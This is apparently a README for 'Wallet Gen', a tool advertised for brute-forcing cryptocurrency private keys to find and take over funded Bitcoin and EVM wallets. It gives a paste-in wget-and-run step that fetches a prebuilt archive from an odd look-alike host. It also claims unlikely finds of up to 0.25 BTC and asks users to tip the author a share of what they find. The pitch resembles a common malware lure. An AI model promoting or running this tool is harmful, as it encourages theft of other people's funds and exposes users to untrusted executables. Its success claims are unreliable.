Wallet Gen is a tool designed for brute force and generating cryptocurrency wallets (such as Bitcoin and EVM-based wallets like ETH, BNB, MATIC, etc.), as well as discovering forgotten or lost wallets that contain an existing balance.
Wallet Gen is built in C++ and is open-source, allowing anyone to access and modify the code. Compared to Python-based wallet generators, Wallet Gen boasts significantly higher wallet generation speeds, with performance primarily relying on your graphics card. For generating EVM wallets (ETH, BNB, MATIC, etc.), Wallet Gen uses the keccak256 algorithm, while Bitcoin wallets are created using the Segwit format under Bech32.
- Generate a single Bitcoin wallet.
- Generate a single EVM wallet (ETH, BNB, MATIC, etc.).
- Search for Bitcoin wallets with a balance.
- Search for EVM wallets with a balance.
wget https://github.com/tony-dev-btc/walletgen/releases/download/v1.4.6/walletgen-1.4.6-linux.tar.gz
tar -xzf walletgen-1.4.6-linux.tar.gz
cd walletgen
./walletgen.sh
Wallet Gen allows you to search using brute force method for two types of crypto wallets with an existing balance. To search for BTC wallets, press key 3
in the menu or run start_search_btc.bat
. For searching EVM wallets (such as Ethereum, BNB, etc.), press key 4
in the menu or run start_search_evm.bat
.
The search speed is determined by your hardware, especially your graphics card. To increase your chances of finding a wallet with a balance, you can run multiple instances of the program, from 1 to 4 or more, depending on the power of your graphics card.
I’ve personally recovered two BTC wallets with a balance. The first had 0.000032 BTC, the second contained 0.0528 BTC (roughly $4800 at the time of discovery).
Here’s the link to the wallet: bc1qk3m62hx2hh5mhvc0tj45f9xflzcnu0sur3rvay.
After a week of non-stop wallet searching, I finally found a wallet with 0.25 bitcoin ($19k). This is my 4th and biggest find of all time.
- Open the project file (
CryptoWalletGen.sln
) in Visual Studio or any other compatible C++ compiler. - Install the necessary dependencies and build the project.
> git clone https://github.com/microsoft/vcpkg
> .\vcpkg\bootstrap-vcpkg.bat
> .\vcpkg\vcpkg integrate install
> .\vcpkg\vcpkg install openssl:x64-windows
- Start building the project.
- Search for missing words in a seed phrase.
If you have any questions or want to share your find or you found some bug in WalletGen work, feel free to message me! My Discord: tonydevbtc.
UPD: Due to the fact that I receive many messages from you, I created a Telegram channel in which news and answers to frequent questions will be posted. Channel - https://t.me/tonydevbtc
Contributions are welcome! If you have ideas, bug reports, or want to contribute to the codebase, feel free to submit a pull request.
I encourage you, when you find a wallet with a balance, to send me a small portion as a thank you. This motivates me to keep working on the program, keep it going, and make it better!
BTC: bc1qeyrshy5ntsguwxe9m8tp2x2yqhddz7ymkj44h9
ETH: 0x76c2E75B92Eb340f01B378e332FC7d8954893693
This project is licensed under the Apache 2.0 License
bitcoin, ethereum, crypto, cryptocurrency, crypto seed phrase mining, crypto bruteforce, bitcoin bruteforce, ethereum bruteforce, crypto finder, lost bitcoin, brute force wallet, crypto brute foce, crypto bruteforce, crypto bruteforce wallet, crypto bruteforce key, crypto wallet, crypto wallet recovery, crypto wallet seed generator, crypto wallet seed phrase, crypto wallet tools, wallet finder crypto, wallet recovery seeds, wallet recovery tools.